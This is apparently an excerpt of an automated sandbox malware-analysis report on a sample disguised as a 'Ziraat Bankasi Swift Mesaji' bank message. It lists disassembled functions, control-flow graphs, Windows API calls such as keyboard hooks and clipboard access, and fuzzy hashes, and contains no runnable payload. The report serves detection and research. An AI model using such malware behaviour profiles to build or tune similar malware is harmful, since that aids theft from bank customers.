                                                                          • Snapshot File: hcaresult_5_2_6e50000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fd18c74af932b4be8f91074a715adc76d794081bca5019369af0fe950ce54db7
                                                                          • Instruction ID: 7adfc3b1466bae2e35f2cb53f00b207f10fe0187c2a1b1ff8b99d485bfa346ed
                                                                          • Opcode Fuzzy Hash: fd18c74af932b4be8f91074a715adc76d794081bca5019369af0fe950ce54db7
                                                                          • Instruction Fuzzy Hash: C9214270E01208CFDB18EFB9D0447DDBBB2AF89314F209129C419B72A4EB395846CF55
                                                                          Function 0541E151 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 691 541e151-541e1ef GetCurrentProcess 696 541e1f1-541e1f7 691->696 697 541e1f8-541e22c GetCurrentThread 691->697 696->697 698 541e235-541e269 GetCurrentProcess 697->698 699 541e22e-541e234 697->699 701 541e272-541e28d call 541e32f 698->701 702 541e26b-541e271 698->702 699->698 704 541e293-541e2c2 GetCurrentThreadId 701->704 702->701 706 541e2c4-541e2ca 704->706 707 541e2cb-541e32d 704->707 706->707
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 0541E1DE
                                                                          • GetCurrentThread.KERNEL32 ref: 0541E21B
                                                                          • GetCurrentProcess.KERNEL32 ref: 0541E258
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0541E2B1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 48f58396d166db3748c823e118032124a713814ab4d74b1e0403b8f5f1729a99
                                                                          • Instruction ID: 0abccc35cbe5d3dc53c015b068aa9c453e2c313b84354023751b5cd18d97b41a
                                                                          • Opcode Fuzzy Hash: 48f58396d166db3748c823e118032124a713814ab4d74b1e0403b8f5f1729a99
                                                                          • Instruction Fuzzy Hash: 145168B49016098FDB18CFA9D548BEEBFF1FF48314F24845AE409A7350D7749944CB69
                                                                          Function 0541E160 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 714 541e160-541e1ef GetCurrentProcess 718 541e1f1-541e1f7 714->718 719 541e1f8-541e22c GetCurrentThread 714->719 718->719 720 541e235-541e269 GetCurrentProcess 719->720 721 541e22e-541e234 719->721 723 541e272-541e28d call 541e32f 720->723 724 541e26b-541e271 720->724 721->720 726 541e293-541e2c2 GetCurrentThreadId 723->726 724->723 728 541e2c4-541e2ca 726->728 729 541e2cb-541e32d 726->729 728->729
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 0541E1DE
                                                                          • GetCurrentThread.KERNEL32 ref: 0541E21B
                                                                          • GetCurrentProcess.KERNEL32 ref: 0541E258
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0541E2B1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: ab428fb0f0dd861335dd1b498c6a97a527ac055e9742a7bc9ca1297c57585b43
                                                                          • Instruction ID: eb878ae7f9e2135e19fdaf7e0ca25d04debdadf4852af22d73842fa73bf36e21
                                                                          • Opcode Fuzzy Hash: ab428fb0f0dd861335dd1b498c6a97a527ac055e9742a7bc9ca1297c57585b43
                                                                          • Instruction Fuzzy Hash: 875156B49016098FDB18CFA9D548BEEBFF1FF88314F208459E419A7350D7745944CB69
                                                                          Function 02BE8848 Relevance: 3.3, Strings: 2, Instructions: 789COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1884 2be8848-2be8d36 1959 2be8d3c-2be8d4c 1884->1959 1960 2be9288-2be92a8 1884->1960 1959->1960 1961 2be8d52-2be8d62 1959->1961 1964 2be92aa-2be92bd 1960->1964 1965 2be92f9-2be9301 1960->1965 1961->1960 1963 2be8d68-2be8d78 1961->1963 1963->1960 1966 2be8d7e-2be8d8e 1963->1966 1967 2be92bf-2be92c4 1964->1967 1968 2be92c9-2be92e7 1964->1968 1973 2be9326-2be9329 1965->1973 1974 2be9303-2be930e 1965->1974 1966->1960 1969 2be8d94-2be8da4 1966->1969 1971 2be93ae-2be93b3 1967->1971 1996 2be935e-2be936a 1968->1996 1997 2be92e9-2be92f3 1968->1997 1969->1960 1972 2be8daa-2be8dba 1969->1972 1972->1960 1976 2be8dc0-2be8dd0 1972->1976 1977 2be932b-2be9337 1973->1977 1978 2be9340-2be934c 1973->1978 1974->1973 1986 2be9310-2be931a 1974->1986 1976->1960 1979 2be8dd6-2be8de6 1976->1979 1977->1978 1992 2be9339-2be933e 1977->1992 1980 2be934e-2be9355 1978->1980 1981 2be93b4-2be93c4 1978->1981 1979->1960 1984 2be8dec-2be8dfc 1979->1984 1980->1981 1985 2be9357-2be935c 1980->1985 1993 2be9416-2be941d 1981->1993 1994 2be93c6-2be9410 1981->1994 1984->1960 1988 2be8e02-2be8e12 1984->1988 1985->1971 1986->1973 1999 2be931c-2be9321 1986->1999 1988->1960 1989 2be8e18-2be9287 1988->1989 1992->1971 2000 2be94a6-2be94f8 1993->2000 2001 2be9423-2be942e 1993->2001 1994->2001 2017 2be9412 1994->2017 2008 2be936c-2be9378 1996->2008 2009 2be9381-2be938d 1996->2009 1997->1996 2005 2be92f5-2be92f7 1997->2005 1999->1971 2011 2be94ff-2be952b 2000->2011 2001->2011 2012 2be9434-2be9491 2001->2012 2005->1965 2008->2009 2020 2be937a-2be937f 2008->2020 2022 2be938f-2be939b 2009->2022 2023 2be93a4-2be93a6 2009->2023 2031 2be949a-2be94a3 2012->2031 2017->1993 2020->1971 2022->2023 2029 2be939d-2be93a2 2022->2029 2023->1971 2029->1971
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $]q$$]q
                                                                          • API String ID: 0-127220927
                                                                          • Opcode ID: 3a3f8219a5740af736fb0070f6cecaeaf185e756e65472149b8a32677078bd74
                                                                          • Instruction ID: 8fc6edbada0fe6747a76f0ac74302f4d8e380d7eac8aedca60a259ccf681fa83
                                                                          • Opcode Fuzzy Hash: 3a3f8219a5740af736fb0070f6cecaeaf185e756e65472149b8a32677078bd74
                                                                          • Instruction Fuzzy Hash: 73625471A101198FEB259BA4C864BDEBFB2FF88300F1081A9C10A6B395DF359D85DF95
                                                                          Function 02BE65F1 Relevance: 2.7, Strings: 2, Instructions: 222COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2168 2be65f1-2be660d 2169 2be660f-2be6613 2168->2169 2170 2be6615-2be6617 2168->2170 2169->2170 2171 2be661c-2be6627 2169->2171 2172 2be6828-2be682f 2170->2172 2173 2be662d-2be6634 2171->2173 2174 2be6830 2171->2174 2175 2be663a-2be6649 2173->2175 2176 2be67c9-2be67cf 2173->2176 2178 2be6835-2be686d 2174->2178 2177 2be664f-2be665e 2175->2177 2175->2178 2179 2be67d5-2be67d9 2176->2179 2180 2be67d1-2be67d3 2176->2180 2186 2be6673-2be6676 2177->2186 2187 2be6660-2be6663 2177->2187 2208 2be686f-2be6874 2178->2208 2209 2be6876-2be687a 2178->2209 2181 2be67db-2be67e1 2179->2181 2182 2be6826 2179->2182 2180->2172 2181->2174 2184 2be67e3-2be67e6 2181->2184 2182->2172 2184->2174 2188 2be67e8-2be67fd 2184->2188 2191 2be6682-2be6688 2186->2191 2192 2be6678-2be667b 2186->2192 2190 2be6665-2be6668 2187->2190 2187->2191 2206 2be67ff-2be6805 2188->2206 2207 2be6821-2be6824 2188->2207 2193 2be666e 2190->2193 2194 2be6769-2be676f 2190->2194 2199 2be668a-2be6690 2191->2199 2200 2be66a0-2be66bd 2191->2200 2195 2be66ce-2be66d4 2192->2195 2196 2be667d 2192->2196 2203 2be6794-2be67a1 2193->2203 2201 2be6787-2be6791 2194->2201 2202 2be6771-2be6777 2194->2202 2204 2be66ec-2be66fe 2195->2204 2205 2be66d6-2be66dc 2195->2205 2196->2203 2210 2be6694-2be669e 2199->2210 2211 2be6692 2199->2211 2241 2be66c6-2be66c9 2200->2241 2201->2203 2212 2be677b-2be6785 2202->2212 2213 2be6779 2202->2213 2230 2be67b5-2be67b7 2203->2230 2231 2be67a3-2be67a7 2203->2231 2233 2be670e-2be6731 2204->2233 2234 2be6700-2be670c 2204->2234 2215 2be66de 2205->2215 2216 2be66e0-2be66ea 2205->2216 2217 2be6817-2be681a 2206->2217 2218 2be6807-2be6815 2206->2218 2207->2172 2219 2be6880-2be6882 2208->2219 2209->2219 2210->2200 2211->2200 2212->2201 2213->2201 2215->2204 2216->2204 2217->2174 2225 2be681c-2be681f 2217->2225 2218->2174 2218->2217 2222 2be6897-2be689e 2219->2222 2223 2be6884-2be6896 2219->2223 2225->2206 2225->2207 2237 2be67bb-2be67be 2230->2237 2231->2230 2235 2be67a9-2be67ad 2231->2235 2233->2174 2245 2be6737-2be673a 2233->2245 2243 2be6759-2be6767 2234->2243 2235->2174 2242 2be67b3 2235->2242 2237->2174 2238 2be67c0-2be67c3 2237->2238 2238->2175 2238->2176 2241->2203 2242->2237 2243->2203 2245->2174 2247 2be6740-2be6752 2245->2247 2247->2243
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ,aq$,aq
                                                                          • API String ID: 0-2990736959
                                                                          • Opcode ID: 281e64d2ba765f82a8799d94be173a978b2e292369e9ac52c378e3088374eed7
                                                                          • Instruction ID: 68624ebfb832ed83f0ce0dcfe30453d5708a24592ddaa5ec5f02a900677099fe
                                                                          • Opcode Fuzzy Hash: 281e64d2ba765f82a8799d94be173a978b2e292369e9ac52c378e3088374eed7
                                                                          • Instruction Fuzzy Hash: 18818174A10105CFCF18CF69C484AAABBBAFF99218B1581AAD817D7365DB31EC41CF91
                                                                          Function 02BE2508 Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2249 2be2508-2be2527 2250 2be252d-2be2536 2249->2250 2251 2be26e2-2be2707 2249->2251 2254 2be270e-2be27a8 call 2be2270 2250->2254 2255 2be253c-2be2591 2250->2255 2251->2254 2295 2be27ad-2be27b2 2254->2295 2264 2be25bb-2be25c4 2255->2264 2265 2be2593-2be25b8 2255->2265 2267 2be25c9-2be25d9 2264->2267 2268 2be25c6 2264->2268 2265->2264 2306 2be25db call 2be26ea 2267->2306 2307 2be25db call 2be24f8 2267->2307 2308 2be25db call 2be2508 2267->2308 2268->2267 2270 2be25e1-2be25e3 2272 2be263d-2be268a 2270->2272 2273 2be25e5-2be25ea 2270->2273 2287 2be2691-2be2696 2272->2287 2275 2be25ec-2be2621 2273->2275 2276 2be2623-2be2636 2273->2276 2275->2287 2276->2272 2288 2be2698 2287->2288 2289 2be26a0-2be26a5 2287->2289 2288->2289 2292 2be26af-2be26b4 2289->2292 2293 2be26a7 2289->2293 2296 2be26c9-2be26ca 2292->2296 2297 2be26b6-2be26c4 call 2be20e4 call 2be20fc 2292->2297 2293->2292 2296->2251 2297->2296 2306->2270 2307->2270 2308->2270
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (&]q$(aq
                                                                          • API String ID: 0-1602648543
                                                                          • Opcode ID: f5b090c95209c6deb648150aabd1ecf02ebcb1415c9c47c21c4e3e31dee2e546
                                                                          • Instruction ID: 9932e23eccc23ba903741c7728b3e8bad1b19cff02b7deb4a48eb93f288cf88d
                                                                          • Opcode Fuzzy Hash: f5b090c95209c6deb648150aabd1ecf02ebcb1415c9c47c21c4e3e31dee2e546
                                                                          • Instruction Fuzzy Hash: A6718131F002199BDF15DFA8C8506EEBBB6AFD4700F148569E406AB384DF34AD46CBA5
                                                                          Function 02BE6130 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2349 2be6130-2be6162 2350 2be6178-2be6183 2349->2350 2351 2be6164-2be6168 2349->2351 2354 2be622b-2be6257 2350->2354 2355 2be6189-2be618b 2350->2355 2352 2be616a-2be6176 2351->2352 2353 2be6190-2be6197 2351->2353 2352->2350 2352->2353 2357 2be6199-2be61a0 2353->2357 2358 2be61b7-2be61c0 2353->2358 2362 2be625e-2be62b6 2354->2362 2356 2be6223-2be6228 2355->2356 2357->2358 2360 2be61a2-2be61ad 2357->2360 2461 2be61c2 call 2be62a8 2358->2461 2462 2be61c2 call 2be6130 2358->2462 2360->2362 2363 2be61b3-2be61b5 2360->2363 2361 2be61c8-2be61ca 2364 2be61cc-2be61d0 2361->2364 2365 2be61d2-2be61da 2361->2365 2382 2be62b8-2be62be 2362->2382 2383 2be62c5-2be62d6 call 2be2a50 2362->2383 2363->2356 2364->2365 2367 2be61ed-2be61fe 2364->2367 2368 2be61dc-2be61e1 2365->2368 2369 2be61e9-2be61eb 2365->2369 2453 2be6201 call 2be6998 2367->2453 2454 2be6201 call 2be6988 2367->2454 2455 2be6201 call 2be6a11 2367->2455 2368->2369 2369->2356 2372 2be6207-2be620c 2375 2be620e-2be6217 2372->2375 2376 2be6221 2372->2376 2458 2be6219 call 2be947d 2375->2458 2459 2be6219 call 2be8838 2375->2459 2460 2be6219 call 2be8848 2375->2460 2376->2356 2378 2be621f 2378->2356 2382->2383 2386 2be62dc-2be62e0 2383->2386 2387 2be636a-2be636c 2383->2387 2388 2be62e2-2be62ee 2386->2388 2389 2be62f0-2be62fd 2386->2389 2456 2be636e call 2be62a8 2387->2456 2457 2be636e call 2be6130 2387->2457 2395 2be62ff-2be6309 2388->2395 2389->2395 2390 2be6374-2be637a 2393 2be637c-2be6382 2390->2393 2394 2be6386-2be638d 2390->2394 2396 2be63e8-2be6447 2393->2396 2397 2be6384 2393->2397 2400 2be630b-2be631a 2395->2400 2401 2be6336-2be633a 2395->2401 2409 2be644e-2be647e 2396->2409 2397->2394 2412 2be631c-2be6323 2400->2412 2413 2be632a-2be6334 2400->2413 2402 2be633c-2be6342 2401->2402 2403 2be6346-2be634a 2401->2403 2405 2be6344 2402->2405 2406 2be6390-2be63e1 2402->2406 2403->2394 2407 2be634c-2be6350 2403->2407 2405->2394 2406->2396 2407->2409 2410 2be6356-2be6368 2407->2410 2424 2be64a3-2be64b0 2409->2424 2425 2be6480-2be648d 2409->2425 2410->2394 2412->2413 2413->2401 2430 2be64b2-2be64bc 2424->2430 2431 2be649f-2be64a1 2425->2431 2432 2be648f-2be649d 2425->2432 2438 2be64be-2be64cc 2430->2438 2439 2be64e4-2be64e6 call 2be65f1 2430->2439 2431->2430 2432->2430 2444 2be64ce-2be64d2 2438->2444 2445 2be64d9-2be64e2 2438->2445 2442 2be64ec-2be64f0 2439->2442 2446 2be6509-2be650d 2442->2446 2447 2be64f2-2be6507 2442->2447 2444->2445 2445->2439 2448 2be650f-2be6524 2446->2448 2449 2be652b-2be6531 2446->2449 2447->2449 2448->2449 2453->2372 2454->2372 2455->2372 2456->2390 2457->2390 2458->2378 2459->2378 2460->2378 2461->2361 2462->2361
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Haq$Haq
                                                                          • API String ID: 0-4016896955
                                                                          • Opcode ID: 942d0ab39f21c545db8c6323d6bd4ab8c18f671e09f3d3dd66bb142ba700c9c3
                                                                          • Instruction ID: 6d2cd63da08fb8a062e76fd22df69320cdd5b20cbdbcf5cc8dc699fc1516a874
                                                                          • Opcode Fuzzy Hash: 942d0ab39f21c545db8c6323d6bd4ab8c18f671e09f3d3dd66bb142ba700c9c3
                                                                          • Instruction Fuzzy Hash: 8D51F331B042558FDF168F68D854BAE7BF6FF99304F0488A9E846CB281DB34C841CB91
                                                                          Function 0541B4C6 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0541B5E2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 4ba69b08c75f5f9084e84c51b09132438a16965c3830acee0bdf081b81fb0a43
                                                                          • Instruction ID: 393a608d3d8c2d09b55417f0b366ac81bb80a21073cb84fa59a9d866dfbfe027
                                                                          • Opcode Fuzzy Hash: 4ba69b08c75f5f9084e84c51b09132438a16965c3830acee0bdf081b81fb0a43
                                                                          • Instruction Fuzzy Hash: 1451DDB5D00309DFDB14CFA9C884ADEBBB1FF48310F24812AE819AB250D775A981CF95
                                                                          Function 0541B4D0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0541B5E2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 1b067c0bb437d753b64b3cee200c16c82e087c1d7c3ffb7a627c92df68db8cd0
                                                                          • Instruction ID: 4965d037c4f0e1e0333f1c77ed1171718caa25a66b2505f938201ebd70c6daaa
                                                                          • Opcode Fuzzy Hash: 1b067c0bb437d753b64b3cee200c16c82e087c1d7c3ffb7a627c92df68db8cd0
                                                                          • Instruction Fuzzy Hash: EC41DDB1D003099FDB14CF9AC884ADEBBB5FF48300F24812AE819AB210D775A981CF95
                                                                          Function 0541F004 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 0541F661
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: CallProcWindow
                                                                          • String ID:
                                                                          • API String ID: 2714655100-0
                                                                          • Opcode ID: d82aeabb47b77d09be541b2163b82db319bdd71c30734728197c847bb02c5fae
                                                                          • Instruction ID: 152a8e88572a152567a3c1c4edcebc7853edfdb48bf667e09fc46b1e02042a22
                                                                          • Opcode Fuzzy Hash: d82aeabb47b77d09be541b2163b82db319bdd71c30734728197c847bb02c5fae
                                                                          • Instruction Fuzzy Hash: 22413BB9900309DFCB14CF59C488AEABBF5FF88314F14C499D919A7321D774A846CBA4
                                                                          Function 06E57213 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4542334944.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e50000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard
                                                                          • String ID:
                                                                          • API String ID: 220874293-0
                                                                          • Opcode ID: 28040e29e409f56b8de751558498f05b08aee0d82b8e29a588e5fc4f25bdc899
                                                                          • Instruction ID: 89feb2c9737c7180426e0cf5f0a1cbdf66eb39f0f1557c581ebfde7c259abcc6
                                                                          • Opcode Fuzzy Hash: 28040e29e409f56b8de751558498f05b08aee0d82b8e29a588e5fc4f25bdc899
                                                                          • Instruction Fuzzy Hash: 8F3102B4D01249DFDB14CF99C988BCEBBF5AF48314F248019E804AB294D7B5A985CBA5
                                                                          Function 06E57218 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4542334944.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e50000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard
                                                                          • String ID:
                                                                          • API String ID: 220874293-0
                                                                          • Opcode ID: 8a733cdcbb6feb646d03e394bcf58c60b42ab1282a508dacd8ff91a962a6ee18
                                                                          • Instruction ID: 7f97732de672b2538fdc92693049dcee88d991f91aa3889f0f4793db8f356e23
                                                                          • Opcode Fuzzy Hash: 8a733cdcbb6feb646d03e394bcf58c60b42ab1282a508dacd8ff91a962a6ee18
                                                                          • Instruction Fuzzy Hash: 993111B0D01309DFDB14CF99C988BCEBBF5AB48314F248019E804BB294D7B4A944CB65
                                                                          Function 0541E3A3 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0541E42F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 3fb6d8c710205a83a5552a51ff9c9373da3ea4854992ff87f416ea8387314bf9
                                                                          • Instruction ID: 9fa054e2f4481c71b8a9871257e70debf2b81316375af2cd6607be2a7ade56f7
                                                                          • Opcode Fuzzy Hash: 3fb6d8c710205a83a5552a51ff9c9373da3ea4854992ff87f416ea8387314bf9
                                                                          • Instruction Fuzzy Hash: A121E4B59002199FDB10CF9AD984ADEBFF8FB48310F14841AE914A3350D379A950CFA5
                                                                          Function 0541E3A8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0541E42F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 86925ac1ad855a05918c8a73ac5a7e5bd4a70f69bfee1b54a6b7dd6b77e15990
                                                                          • Instruction ID: fb200f1bdbf7bd79931fa7e44ae96a2a45f866b9e7b6624bbcc9c785ec1b528a
                                                                          • Opcode Fuzzy Hash: 86925ac1ad855a05918c8a73ac5a7e5bd4a70f69bfee1b54a6b7dd6b77e15990
                                                                          • Instruction Fuzzy Hash: 2021F3B59002199FDB10CFAAD984ADEFFF8FB48310F14841AE918A3350D379A950CFA5
                                                                          Function 0111C76C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LdrInitializeThunk.NTDLL(00000000), ref: 0111C8AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4527154963.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_1110000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 70946d0db0aabaf0dbf5af36a93e375fc6b1058125ef9e1511bb1d7dad809a46
                                                                          • Instruction ID: 41bd0be0a7521c3d2c25731d022c7712d216351627fac6594f3b49301d9bc9da
                                                                          • Opcode Fuzzy Hash: 70946d0db0aabaf0dbf5af36a93e375fc6b1058125ef9e1511bb1d7dad809a46
                                                                          • Instruction Fuzzy Hash: A1117F74E412098FDB0CDFA8D4C4BADFBB5FB88314F149125E804A724AD730A941CB90
                                                                          Function 0111FF18 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0111FF9B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4527154963.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_1110000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: HookWindows
                                                                          • String ID:
                                                                          • API String ID: 2559412058-0
                                                                          • Opcode ID: a8b50072b4cdd3f5ebb8c721cf4216a95d3a837c334f8c318a4db9d99fbb50ca
                                                                          • Instruction ID: 10271ab9922ca155881b528bdfd2ac389c0320dbaaedfbf5fa6f77a0270c28dc
                                                                          • Opcode Fuzzy Hash: a8b50072b4cdd3f5ebb8c721cf4216a95d3a837c334f8c318a4db9d99fbb50ca
                                                                          • Instruction Fuzzy Hash: D02137B590020A8FDB14DFA9C944BEEFBF4BF48310F10842AE458A7250C774A945CFA1
                                                                          Function 0111FF20 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0111FF9B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4527154963.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_1110000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: HookWindows
                                                                          • String ID:
                                                                          • API String ID: 2559412058-0
                                                                          • Opcode ID: e41f94b2aef060379b344a4c8805ac764f1b2f95b0827d6a24cd7e979e227d23
                                                                          • Instruction ID: 31b7ee3a07839bf1c7915622e664a542bb221abc5d475d7fe513a1f4ac3147d3
                                                                          • Opcode Fuzzy Hash: e41f94b2aef060379b344a4c8805ac764f1b2f95b0827d6a24cd7e979e227d23
                                                                          • Instruction Fuzzy Hash: A52115B590020A8FDB14DF99C844BDEFBF5FB88310F10842AE459A7250D775A945CFA1
                                                                          Function 0541906C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0541AE06
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
